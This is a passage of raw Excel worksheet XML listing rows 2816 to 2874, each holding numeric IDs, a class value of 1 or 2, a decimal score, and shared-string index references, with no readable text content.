        <v>0.99650001525878906</v>
      </c>
      <c r="F2816" t="s">
        <v>3911</v>
      </c>
      <c r="G2816" t="s">
        <v>5565</v>
      </c>
      <c r="H2816" t="s">
        <v>5566</v>
      </c>
    </row>
    <row r="2817" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2817" s="1">
        <v>2815</v>
      </c>
      <c r="B2817">
        <v>5768</v>
      </c>
      <c r="C2817">
        <v>5768</v>
      </c>
      <c r="D2817">
        <v>1</v>
      </c>
      <c r="E2817">
        <v>0.91850000619888306</v>
      </c>
      <c r="F2817" t="s">
        <v>3911</v>
      </c>
      <c r="G2817" t="s">
        <v>5567</v>
      </c>
      <c r="H2817" t="s">
        <v>5568</v>
      </c>
    </row>
    <row r="2818" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2818" s="1">
        <v>2816</v>
      </c>
      <c r="B2818">
        <v>2046</v>
      </c>
      <c r="C2818">
        <v>2046</v>
      </c>
      <c r="D2818">
        <v>1</v>
      </c>
      <c r="E2818">
        <v>0.92989999055862427</v>
      </c>
      <c r="F2818" t="s">
        <v>3911</v>
      </c>
      <c r="G2818" t="s">
        <v>5569</v>
      </c>
      <c r="H2818" t="s">
        <v>5570</v>
      </c>
    </row>
    <row r="2819" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2819" s="1">
        <v>2817</v>
      </c>
      <c r="B2819">
        <v>1919</v>
      </c>
      <c r="C2819">
        <v>1919</v>
      </c>
      <c r="D2819">
        <v>1</v>
      </c>
      <c r="E2819">
        <v>0.9625999927520752</v>
      </c>
      <c r="F2819" t="s">
        <v>3911</v>
      </c>
      <c r="G2819" t="s">
        <v>5571</v>
      </c>
      <c r="H2819" t="s">
        <v>5572</v>
      </c>
    </row>
    <row r="2820" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2820" s="1">
        <v>2818</v>
      </c>
      <c r="B2820">
        <v>1918</v>
      </c>
      <c r="C2820">
        <v>1918</v>
      </c>
      <c r="D2820">
        <v>1</v>
      </c>
      <c r="E2820">
        <v>0.77350002527236938</v>
      </c>
      <c r="F2820" t="s">
        <v>3911</v>
      </c>
      <c r="G2820" t="s">
        <v>5573</v>
      </c>
      <c r="H2820" t="s">
        <v>5574</v>
      </c>
    </row>
    <row r="2821" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2821" s="1">
        <v>2819</v>
      </c>
      <c r="B2821">
        <v>1962</v>
      </c>
      <c r="C2821">
        <v>1962</v>
      </c>
      <c r="D2821">
        <v>1</v>
      </c>
      <c r="E2821">
        <v>0.68220001459121704</v>
      </c>
      <c r="F2821" t="s">
        <v>3911</v>
      </c>
      <c r="G2821" t="s">
        <v>5575</v>
      </c>
      <c r="H2821" t="s">
        <v>5576</v>
      </c>
    </row>
    <row r="2822" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2822" s="1">
        <v>2820</v>
      </c>
      <c r="B2822">
        <v>5774</v>
      </c>
      <c r="C2822">
        <v>5774</v>
      </c>
      <c r="D2822">
        <v>1</v>
      </c>
      <c r="E2822">
        <v>0.99930000305175781</v>
      </c>
      <c r="F2822" t="s">
        <v>3911</v>
      </c>
      <c r="G2822" t="s">
        <v>5577</v>
      </c>
      <c r="H2822" t="s">
        <v>5578</v>
      </c>
    </row>
    <row r="2823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2823" s="1">
        <v>2821</v>
      </c>
      <c r="B2823">
        <v>1990</v>
      </c>
      <c r="C2823">
        <v>1990</v>
      </c>
      <c r="D2823">
        <v>1</v>
      </c>
      <c r="E2823">
        <v>0.73360002040863037</v>
      </c>
      <c r="F2823" t="s">
        <v>3911</v>
      </c>
      <c r="G2823" t="s">
        <v>5579</v>
      </c>
      <c r="H2823" t="s">
        <v>5580</v>
      </c>
    </row>
    <row r="2824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2824" s="1">
        <v>2822</v>
      </c>
      <c r="B2824">
        <v>5775</v>
      </c>
      <c r="C2824">
        <v>5775</v>
      </c>
      <c r="D2824">
        <v>1</v>
      </c>
      <c r="E2824">
        <v>0.99699997901916504</v>
      </c>
      <c r="F2824" t="s">
        <v>3911</v>
      </c>
      <c r="G2824" t="s">
        <v>5581</v>
      </c>
      <c r="H2824" t="s">
        <v>5582</v>
      </c>
    </row>
    <row r="2825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2825" s="1">
        <v>2823</v>
      </c>
      <c r="B2825">
        <v>1960</v>
      </c>
      <c r="C2825">
        <v>1960</v>
      </c>
      <c r="D2825">
        <v>1</v>
      </c>
      <c r="E2825">
        <v>0.58950001001358032</v>
      </c>
      <c r="F2825" t="s">
        <v>3911</v>
      </c>
      <c r="G2825" t="s">
        <v>5583</v>
      </c>
      <c r="H2825" t="s">
        <v>5513</v>
      </c>
    </row>
    <row r="2826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2826" s="1">
        <v>2824</v>
      </c>
      <c r="B2826">
        <v>2029</v>
      </c>
      <c r="C2826">
        <v>2029</v>
      </c>
      <c r="D2826">
        <v>1</v>
      </c>
      <c r="E2826">
        <v>0.67070001363754272</v>
      </c>
      <c r="F2826" t="s">
        <v>3911</v>
      </c>
      <c r="G2826" t="s">
        <v>5584</v>
      </c>
      <c r="H2826" t="s">
        <v>5585</v>
      </c>
    </row>
    <row r="2827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2827" s="1">
        <v>2825</v>
      </c>
      <c r="B2827">
        <v>1958</v>
      </c>
      <c r="C2827">
        <v>1958</v>
      </c>
      <c r="D2827">
        <v>1</v>
      </c>
      <c r="E2827">
        <v>0.98409998416900635</v>
      </c>
      <c r="F2827" t="s">
        <v>3911</v>
      </c>
      <c r="G2827" t="s">
        <v>5586</v>
      </c>
      <c r="H2827" t="s">
        <v>5587</v>
      </c>
    </row>
    <row r="2828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2828" s="1">
        <v>2826</v>
      </c>
      <c r="B2828">
        <v>3449</v>
      </c>
      <c r="C2828">
        <v>3449</v>
      </c>
      <c r="D2828">
        <v>1</v>
      </c>
      <c r="E2828">
        <v>0.47229999303817749</v>
      </c>
      <c r="F2828" t="s">
        <v>3911</v>
      </c>
      <c r="G2828" t="s">
        <v>5588</v>
      </c>
      <c r="H2828" t="s">
        <v>5589</v>
      </c>
    </row>
    <row r="2829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2829" s="1">
        <v>2827</v>
      </c>
      <c r="B2829">
        <v>5989</v>
      </c>
      <c r="C2829">
        <v>5989</v>
      </c>
      <c r="D2829">
        <v>1</v>
      </c>
      <c r="E2829">
        <v>0.65380001068115234</v>
      </c>
      <c r="F2829" t="s">
        <v>3911</v>
      </c>
      <c r="G2829" t="s">
        <v>5590</v>
      </c>
      <c r="H2829" t="s">
        <v>5591</v>
      </c>
    </row>
    <row r="2830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2830" s="1">
        <v>2828</v>
      </c>
      <c r="B2830">
        <v>3678</v>
      </c>
      <c r="C2830">
        <v>3678</v>
      </c>
      <c r="D2830">
        <v>2</v>
      </c>
      <c r="E2830">
        <v>0.53719997406005859</v>
      </c>
      <c r="F2830" t="s">
        <v>5592</v>
      </c>
      <c r="G2830" t="s">
        <v>5593</v>
      </c>
      <c r="H2830" t="s">
        <v>5594</v>
      </c>
    </row>
    <row r="2831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2831" s="1">
        <v>2829</v>
      </c>
      <c r="B2831">
        <v>3833</v>
      </c>
      <c r="C2831">
        <v>3833</v>
      </c>
      <c r="D2831">
        <v>2</v>
      </c>
      <c r="E2831">
        <v>0.50290000438690186</v>
      </c>
      <c r="F2831" t="s">
        <v>5592</v>
      </c>
      <c r="G2831" t="s">
        <v>5595</v>
      </c>
      <c r="H2831" t="s">
        <v>5596</v>
      </c>
    </row>
    <row r="2832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2832" s="1">
        <v>2830</v>
      </c>
      <c r="B2832">
        <v>3692</v>
      </c>
      <c r="C2832">
        <v>3692</v>
      </c>
      <c r="D2832">
        <v>2</v>
      </c>
      <c r="E2832">
        <v>0.71060001850128174</v>
      </c>
      <c r="F2832" t="s">
        <v>5592</v>
      </c>
      <c r="G2832" t="s">
        <v>5597</v>
      </c>
      <c r="H2832" t="s">
        <v>5598</v>
      </c>
    </row>
    <row r="2833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2833" s="1">
        <v>2831</v>
      </c>
      <c r="B2833">
        <v>3919</v>
      </c>
      <c r="C2833">
        <v>3919</v>
      </c>
      <c r="D2833">
        <v>2</v>
      </c>
      <c r="E2833">
        <v>0.91930001974105835</v>
      </c>
      <c r="F2833" t="s">
        <v>5592</v>
      </c>
      <c r="G2833" t="s">
        <v>5599</v>
      </c>
      <c r="H2833" t="s">
        <v>5600</v>
      </c>
    </row>
    <row r="2834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2834" s="1">
        <v>2832</v>
      </c>
      <c r="B2834">
        <v>5578</v>
      </c>
      <c r="C2834">
        <v>5578</v>
      </c>
      <c r="D2834">
        <v>2</v>
      </c>
      <c r="E2834">
        <v>0.99690002202987671</v>
      </c>
      <c r="F2834" t="s">
        <v>5592</v>
      </c>
      <c r="G2834" t="s">
        <v>5601</v>
      </c>
      <c r="H2834" t="s">
        <v>5602</v>
      </c>
    </row>
    <row r="2835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2835" s="1">
        <v>2833</v>
      </c>
      <c r="B2835">
        <v>5459</v>
      </c>
      <c r="C2835">
        <v>5459</v>
      </c>
      <c r="D2835">
        <v>2</v>
      </c>
      <c r="E2835">
        <v>0.99299997091293335</v>
      </c>
      <c r="F2835" t="s">
        <v>5592</v>
      </c>
      <c r="G2835" t="s">
        <v>5603</v>
      </c>
      <c r="H2835" t="s">
        <v>5604</v>
      </c>
    </row>
    <row r="2836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2836" s="1">
        <v>2834</v>
      </c>
      <c r="B2836">
        <v>3880</v>
      </c>
      <c r="C2836">
        <v>3880</v>
      </c>
      <c r="D2836">
        <v>2</v>
      </c>
      <c r="E2836">
        <v>0.52100002765655518</v>
      </c>
      <c r="F2836" t="s">
        <v>5592</v>
      </c>
      <c r="G2836" t="s">
        <v>5605</v>
      </c>
      <c r="H2836" t="s">
        <v>5606</v>
      </c>
    </row>
    <row r="2837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2837" s="1">
        <v>2835</v>
      </c>
      <c r="B2837">
        <v>5429</v>
      </c>
      <c r="C2837">
        <v>5429</v>
      </c>
      <c r="D2837">
        <v>2</v>
      </c>
      <c r="E2837">
        <v>0.9966999888420105</v>
      </c>
      <c r="F2837" t="s">
        <v>5592</v>
      </c>
      <c r="G2837" t="s">
        <v>5607</v>
      </c>
      <c r="H2837" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="2838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2838" s="1">
        <v>2836</v>
      </c>
      <c r="B2838">
        <v>6296</v>
      </c>
      <c r="C2838">
        <v>6296</v>
      </c>
      <c r="D2838">
        <v>2</v>
      </c>
      <c r="E2838">
        <v>0.92199999094009399</v>
      </c>
      <c r="F2838" t="s">
        <v>5592</v>
      </c>
      <c r="G2838" t="s">
        <v>5609</v>
      </c>
      <c r="H2838" t="s">
        <v>5610</v>
      </c>
    </row>
    <row r="2839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2839" s="1">
        <v>2837</v>
      </c>
      <c r="B2839">
        <v>6271</v>
      </c>
      <c r="C2839">
        <v>6271</v>
      </c>
      <c r="D2839">
        <v>2</v>
      </c>
      <c r="E2839">
        <v>0.8004000186920166</v>
      </c>
      <c r="F2839" t="s">
        <v>5592</v>
      </c>
      <c r="G2839" t="s">
        <v>5611</v>
      </c>
      <c r="H2839" t="s">
        <v>5612</v>
      </c>
    </row>
    <row r="2840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2840" s="1">
        <v>2838</v>
      </c>
      <c r="B2840">
        <v>3925</v>
      </c>
      <c r="C2840">
        <v>3925</v>
      </c>
      <c r="D2840">
        <v>2</v>
      </c>
      <c r="E2840">
        <v>0.78179997205734253</v>
      </c>
      <c r="F2840" t="s">
        <v>5592</v>
      </c>
      <c r="G2840" t="s">
        <v>5613</v>
      </c>
      <c r="H2840" t="s">
        <v>5614</v>
      </c>
    </row>
    <row r="2841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2841" s="1">
        <v>2839</v>
      </c>
      <c r="B2841">
        <v>3793</v>
      </c>
      <c r="C2841">
        <v>3793</v>
      </c>
      <c r="D2841">
        <v>2</v>
      </c>
      <c r="E2841">
        <v>0.52469998598098755</v>
      </c>
      <c r="F2841" t="s">
        <v>5592</v>
      </c>
      <c r="G2841" t="s">
        <v>5615</v>
      </c>
      <c r="H2841" t="s">
        <v>5616</v>
      </c>
    </row>
    <row r="2842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2842" s="1">
        <v>2840</v>
      </c>
      <c r="B2842">
        <v>3885</v>
      </c>
      <c r="C2842">
        <v>3885</v>
      </c>
      <c r="D2842">
        <v>2</v>
      </c>
      <c r="E2842">
        <v>0.55870002508163452</v>
      </c>
      <c r="F2842" t="s">
        <v>5592</v>
      </c>
      <c r="G2842" t="s">
        <v>5617</v>
      </c>
      <c r="H2842" t="s">
        <v>5618</v>
      </c>
    </row>
    <row r="2843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2843" s="1">
        <v>2841</v>
      </c>
      <c r="B2843">
        <v>5557</v>
      </c>
      <c r="C2843">
        <v>5557</v>
      </c>
      <c r="D2843">
        <v>2</v>
      </c>
      <c r="E2843">
        <v>0.99229997396469116</v>
      </c>
      <c r="F2843" t="s">
        <v>5592</v>
      </c>
      <c r="G2843" t="s">
        <v>5619</v>
      </c>
      <c r="H2843" t="s">
        <v>5620</v>
      </c>
    </row>
    <row r="2844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2844" s="1">
        <v>2842</v>
      </c>
      <c r="B2844">
        <v>3924</v>
      </c>
      <c r="C2844">
        <v>3924</v>
      </c>
      <c r="D2844">
        <v>2</v>
      </c>
      <c r="E2844">
        <v>0.81290000677108765</v>
      </c>
      <c r="F2844" t="s">
        <v>5592</v>
      </c>
      <c r="G2844" t="s">
        <v>5621</v>
      </c>
      <c r="H2844" t="s">
        <v>5622</v>
      </c>
    </row>
    <row r="2845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2845" s="1">
        <v>2843</v>
      </c>
      <c r="B2845">
        <v>5556</v>
      </c>
      <c r="C2845">
        <v>5556</v>
      </c>
      <c r="D2845">
        <v>2</v>
      </c>
      <c r="E2845">
        <v>0.76010000705718994</v>
      </c>
      <c r="F2845" t="s">
        <v>5592</v>
      </c>
      <c r="G2845" t="s">
        <v>5623</v>
      </c>
      <c r="H2845" t="s">
        <v>5624</v>
      </c>
    </row>
    <row r="2846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2846" s="1">
        <v>2844</v>
      </c>
      <c r="B2846">
        <v>3879</v>
      </c>
      <c r="C2846">
        <v>3879</v>
      </c>
      <c r="D2846">
        <v>2</v>
      </c>
      <c r="E2846">
        <v>0.99790000915527344</v>
      </c>
      <c r="F2846" t="s">
        <v>5592</v>
      </c>
      <c r="G2846" t="s">
        <v>5625</v>
      </c>
      <c r="H2846" t="s">
        <v>5626</v>
      </c>
    </row>
    <row r="2847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2847" s="1">
        <v>2845</v>
      </c>
      <c r="B2847">
        <v>5421</v>
      </c>
      <c r="C2847">
        <v>5421</v>
      </c>
      <c r="D2847">
        <v>2</v>
      </c>
      <c r="E2847">
        <v>0.85159999132156372</v>
      </c>
      <c r="F2847" t="s">
        <v>5592</v>
      </c>
      <c r="G2847" t="s">
        <v>5627</v>
      </c>
      <c r="H2847" t="s">
        <v>5628</v>
      </c>
    </row>
    <row r="2848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2848" s="1">
        <v>2846</v>
      </c>
      <c r="B2848">
        <v>3861</v>
      </c>
      <c r="C2848">
        <v>3861</v>
      </c>
      <c r="D2848">
        <v>2</v>
      </c>
      <c r="E2848">
        <v>0.76800000667572021</v>
      </c>
      <c r="F2848" t="s">
        <v>5592</v>
      </c>
      <c r="G2848" t="s">
        <v>5629</v>
      </c>
      <c r="H2848" t="s">
        <v>5630</v>
      </c>
    </row>
    <row r="2849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2849" s="1">
        <v>2847</v>
      </c>
      <c r="B2849">
        <v>5516</v>
      </c>
      <c r="C2849">
        <v>5516</v>
      </c>
      <c r="D2849">
        <v>2</v>
      </c>
      <c r="E2849">
        <v>0.99260002374649048</v>
      </c>
      <c r="F2849" t="s">
        <v>5592</v>
      </c>
      <c r="G2849" t="s">
        <v>5631</v>
      </c>
      <c r="H2849" t="s">
        <v>5632</v>
      </c>
    </row>
    <row r="2850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2850" s="1">
        <v>2848</v>
      </c>
      <c r="B2850">
        <v>5428</v>
      </c>
      <c r="C2850">
        <v>5428</v>
      </c>
      <c r="D2850">
        <v>2</v>
      </c>
      <c r="E2850">
        <v>0.73629999160766602</v>
      </c>
      <c r="F2850" t="s">
        <v>5592</v>
      </c>
      <c r="G2850" t="s">
        <v>5633</v>
      </c>
      <c r="H2850" t="s">
        <v>5634</v>
      </c>
    </row>
    <row r="2851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2851" s="1">
        <v>2849</v>
      </c>
      <c r="B2851">
        <v>5440</v>
      </c>
      <c r="C2851">
        <v>5440</v>
      </c>
      <c r="D2851">
        <v>2</v>
      </c>
      <c r="E2851">
        <v>0.99779999256134033</v>
      </c>
      <c r="F2851" t="s">
        <v>5592</v>
      </c>
      <c r="G2851" t="s">
        <v>5635</v>
      </c>
      <c r="H2851" t="s">
        <v>5636</v>
      </c>
    </row>
    <row r="2852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2852" s="1">
        <v>2850</v>
      </c>
      <c r="B2852">
        <v>5505</v>
      </c>
      <c r="C2852">
        <v>5505</v>
      </c>
      <c r="D2852">
        <v>2</v>
      </c>
      <c r="E2852">
        <v>0.85790002346038818</v>
      </c>
      <c r="F2852" t="s">
        <v>5592</v>
      </c>
      <c r="G2852" t="s">
        <v>5637</v>
      </c>
      <c r="H2852" t="s">
        <v>5638</v>
      </c>
    </row>
    <row r="2853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2853" s="1">
        <v>2851</v>
      </c>
      <c r="B2853">
        <v>3788</v>
      </c>
      <c r="C2853">
        <v>3788</v>
      </c>
      <c r="D2853">
        <v>2</v>
      </c>
      <c r="E2853">
        <v>0.28769999742507929</v>
      </c>
      <c r="F2853" t="s">
        <v>5592</v>
      </c>
      <c r="G2853" t="s">
        <v>5639</v>
      </c>
      <c r="H2853" t="s">
        <v>5640</v>
      </c>
    </row>
    <row r="2854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2854" s="1">
        <v>2852</v>
      </c>
      <c r="B2854">
        <v>5623</v>
      </c>
      <c r="C2854">
        <v>5623</v>
      </c>
      <c r="D2854">
        <v>2</v>
      </c>
      <c r="E2854">
        <v>0.97229999303817749</v>
      </c>
      <c r="F2854" t="s">
        <v>5592</v>
      </c>
      <c r="G2854" t="s">
        <v>5641</v>
      </c>
      <c r="H2854" t="s">
        <v>5642</v>
      </c>
    </row>
    <row r="2855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2855" s="1">
        <v>2853</v>
      </c>
      <c r="B2855">
        <v>3728</v>
      </c>
      <c r="C2855">
        <v>3728</v>
      </c>
      <c r="D2855">
        <v>2</v>
      </c>
      <c r="E2855">
        <v>0.56510001420974731</v>
      </c>
      <c r="F2855" t="s">
        <v>5592</v>
      </c>
      <c r="G2855" t="s">
        <v>5643</v>
      </c>
      <c r="H2855" t="s">
        <v>5644</v>
      </c>
    </row>
    <row r="2856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2856" s="1">
        <v>2854</v>
      </c>
      <c r="B2856">
        <v>6348</v>
      </c>
      <c r="C2856">
        <v>6348</v>
      </c>
      <c r="D2856">
        <v>2</v>
      </c>
      <c r="E2856">
        <v>0.44629999995231628</v>
      </c>
      <c r="F2856" t="s">
        <v>5592</v>
      </c>
      <c r="G2856" t="s">
        <v>5645</v>
      </c>
      <c r="H2856" t="s">
        <v>5646</v>
      </c>
    </row>
    <row r="2857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2857" s="1">
        <v>2855</v>
      </c>
      <c r="B2857">
        <v>3690</v>
      </c>
      <c r="C2857">
        <v>3690</v>
      </c>
      <c r="D2857">
        <v>2</v>
      </c>
      <c r="E2857">
        <v>0.38780000805854797</v>
      </c>
      <c r="F2857" t="s">
        <v>5592</v>
      </c>
      <c r="G2857" t="s">
        <v>5647</v>
      </c>
      <c r="H2857" t="s">
        <v>5648</v>
      </c>
    </row>
    <row r="2858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2858" s="1">
        <v>2856</v>
      </c>
      <c r="B2858">
        <v>3921</v>
      </c>
      <c r="C2858">
        <v>3921</v>
      </c>
      <c r="D2858">
        <v>2</v>
      </c>
      <c r="E2858">
        <v>0.82480001449584961</v>
      </c>
      <c r="F2858" t="s">
        <v>5592</v>
      </c>
      <c r="G2858" t="s">
        <v>5649</v>
      </c>
      <c r="H2858" t="s">
        <v>5650</v>
      </c>
    </row>
    <row r="2859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2859" s="1">
        <v>2857</v>
      </c>
      <c r="B2859">
        <v>3742</v>
      </c>
      <c r="C2859">
        <v>3742</v>
      </c>
      <c r="D2859">
        <v>2</v>
      </c>
      <c r="E2859">
        <v>0.99739998579025269</v>
      </c>
      <c r="F2859" t="s">
        <v>5592</v>
      </c>
      <c r="G2859" t="s">
        <v>5651</v>
      </c>
      <c r="H2859" t="s">
        <v>5652</v>
      </c>
    </row>
    <row r="2860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2860" s="1">
        <v>2858</v>
      </c>
      <c r="B2860">
        <v>5594</v>
      </c>
      <c r="C2860">
        <v>5594</v>
      </c>
      <c r="D2860">
        <v>2</v>
      </c>
      <c r="E2860">
        <v>0.99320000410079956</v>
      </c>
      <c r="F2860" t="s">
        <v>5592</v>
      </c>
      <c r="G2860" t="s">
        <v>5653</v>
      </c>
      <c r="H2860" t="s">
        <v>5654</v>
      </c>
    </row>
    <row r="2861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2861" s="1">
        <v>2859</v>
      </c>
      <c r="B2861">
        <v>6289</v>
      </c>
      <c r="C2861">
        <v>6289</v>
      </c>
      <c r="D2861">
        <v>2</v>
      </c>
      <c r="E2861">
        <v>0.57039999961853027</v>
      </c>
      <c r="F2861" t="s">
        <v>5592</v>
      </c>
      <c r="G2861" t="s">
        <v>5655</v>
      </c>
      <c r="H2861" t="s">
        <v>5656</v>
      </c>
    </row>
    <row r="2862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2862" s="1">
        <v>2860</v>
      </c>
      <c r="B2862">
        <v>3721</v>
      </c>
      <c r="C2862">
        <v>3721</v>
      </c>
      <c r="D2862">
        <v>2</v>
      </c>
      <c r="E2862">
        <v>0.98479998111724854</v>
      </c>
      <c r="F2862" t="s">
        <v>5592</v>
      </c>
      <c r="G2862" t="s">
        <v>5657</v>
      </c>
      <c r="H2862" t="s">
        <v>5658</v>
      </c>
    </row>
    <row r="2863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2863" s="1">
        <v>2861</v>
      </c>
      <c r="B2863">
        <v>5443</v>
      </c>
      <c r="C2863">
        <v>5443</v>
      </c>
      <c r="D2863">
        <v>2</v>
      </c>
      <c r="E2863">
        <v>0.9146999716758728</v>
      </c>
      <c r="F2863" t="s">
        <v>5592</v>
      </c>
      <c r="G2863" t="s">
        <v>5659</v>
      </c>
      <c r="H2863" t="s">
        <v>5660</v>
      </c>
    </row>
    <row r="2864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2864" s="1">
        <v>2862</v>
      </c>
      <c r="B2864">
        <v>3808</v>
      </c>
      <c r="C2864">
        <v>3808</v>
      </c>
      <c r="D2864">
        <v>2</v>
      </c>
      <c r="E2864">
        <v>0.60559999942779541</v>
      </c>
      <c r="F2864" t="s">
        <v>5592</v>
      </c>
      <c r="G2864" t="s">
        <v>5661</v>
      </c>
      <c r="H2864" t="s">
        <v>5662</v>
      </c>
    </row>
    <row r="2865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2865" s="1">
        <v>2863</v>
      </c>
      <c r="B2865">
        <v>3735</v>
      </c>
      <c r="C2865">
        <v>3735</v>
      </c>
      <c r="D2865">
        <v>2</v>
      </c>
      <c r="E2865">
        <v>0.99320000410079956</v>
      </c>
      <c r="F2865" t="s">
        <v>5592</v>
      </c>
      <c r="G2865" t="s">
        <v>5663</v>
      </c>
      <c r="H2865" t="s">
        <v>5664</v>
      </c>
    </row>
    <row r="2866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2866" s="1">
        <v>2864</v>
      </c>
      <c r="B2866">
        <v>3809</v>
      </c>
      <c r="C2866">
        <v>3809</v>
      </c>
      <c r="D2866">
        <v>2</v>
      </c>
      <c r="E2866">
        <v>0.90060001611709595</v>
      </c>
      <c r="F2866" t="s">
        <v>5592</v>
      </c>
      <c r="G2866" t="s">
        <v>5665</v>
      </c>
      <c r="H2866" t="s">
        <v>5666</v>
      </c>
    </row>
    <row r="2867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2867" s="1">
        <v>2865</v>
      </c>
      <c r="B2867">
        <v>6361</v>
      </c>
      <c r="C2867">
        <v>6361</v>
      </c>
      <c r="D2867">
        <v>2</v>
      </c>
      <c r="E2867">
        <v>0.98150002956390381</v>
      </c>
      <c r="F2867" t="s">
        <v>5592</v>
      </c>
      <c r="G2867" t="s">
        <v>5667</v>
      </c>
      <c r="H2867" t="s">
        <v>5668</v>
      </c>
    </row>
    <row r="2868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2868" s="1">
        <v>2866</v>
      </c>
      <c r="B2868">
        <v>5424</v>
      </c>
      <c r="C2868">
        <v>5424</v>
      </c>
      <c r="D2868">
        <v>2</v>
      </c>
      <c r="E2868">
        <v>0.53549998998641968</v>
      </c>
      <c r="F2868" t="s">
        <v>5592</v>
      </c>
      <c r="G2868" t="s">
        <v>5669</v>
      </c>
      <c r="H2868" t="s">
        <v>5670</v>
      </c>
    </row>
    <row r="2869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2869" s="1">
        <v>2867</v>
      </c>
      <c r="B2869">
        <v>3935</v>
      </c>
      <c r="C2869">
        <v>3935</v>
      </c>
      <c r="D2869">
        <v>2</v>
      </c>
      <c r="E2869">
        <v>0.98409998416900635</v>
      </c>
      <c r="F2869" t="s">
        <v>5592</v>
      </c>
      <c r="G2869" t="s">
        <v>5671</v>
      </c>
      <c r="H2869" t="s">
        <v>5672</v>
      </c>
    </row>
    <row r="2870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2870" s="1">
        <v>2868</v>
      </c>
      <c r="B2870">
        <v>3810</v>
      </c>
      <c r="C2870">
        <v>3810</v>
      </c>
      <c r="D2870">
        <v>2</v>
      </c>
      <c r="E2870">
        <v>0.9879000186920166</v>
      </c>
      <c r="F2870" t="s">
        <v>5592</v>
      </c>
      <c r="G2870" t="s">
        <v>5673</v>
      </c>
      <c r="H2870" t="s">
        <v>5674</v>
      </c>
    </row>
    <row r="2871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2871" s="1">
        <v>2869</v>
      </c>
      <c r="B2871">
        <v>5511</v>
      </c>
      <c r="C2871">
        <v>5511</v>
      </c>
      <c r="D2871">
        <v>2</v>
      </c>
      <c r="E2871">
        <v>0.99900001287460327</v>
      </c>
      <c r="F2871" t="s">
        <v>5592</v>
      </c>
      <c r="G2871" t="s">
        <v>5675</v>
      </c>
      <c r="H2871" t="s">
        <v>5676</v>
      </c>
    </row>
    <row r="2872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2872" s="1">
        <v>2870</v>
      </c>
      <c r="B2872">
        <v>5632</v>
      </c>
      <c r="C2872">
        <v>5632</v>
      </c>
      <c r="D2872">
        <v>2</v>
      </c>
      <c r="E2872">
        <v>0.99639999866485596</v>
      </c>
      <c r="F2872" t="s">
        <v>5592</v>
      </c>
      <c r="G2872" t="s">
        <v>5677</v>
      </c>
      <c r="H2872" t="s">
        <v>5678</v>
      </c>
    </row>
    <row r="2873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2873" s="1">
        <v>2871</v>
      </c>
      <c r="B2873">
        <v>5509</v>
      </c>
      <c r="C2873">
        <v>5509</v>
      </c>
      <c r="D2873">
        <v>2</v>
      </c>
      <c r="E2873">
        <v>0.93599998950958252</v>
      </c>
      <c r="F2873" t="s">
        <v>5592</v>
      </c>
      <c r="G2873" t="s">
        <v>5679</v>
      </c>
      <c r="H2873" t="s">
        <v>5680</v>
      </c>
    </row>
    <row r="2874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2874" s="1">
        <v>2872</v>
      </c>
      <c r="B2874">
        <v>5631</v>
      </c>
      <c r="C2874">
        <v>5631</v>
      </c>
      <c r="D2874">
        <v>2</v>
      </c>
      <c r="E2874">
        <v>0.92710000276565552</v>
      </c>
      <c r="F2874" t="s">
        <v>5592</v>
      </c>
      <c r="G2874" t="s">
        <v>5681</v>
      </c>
      <c r="H2874" t="s">
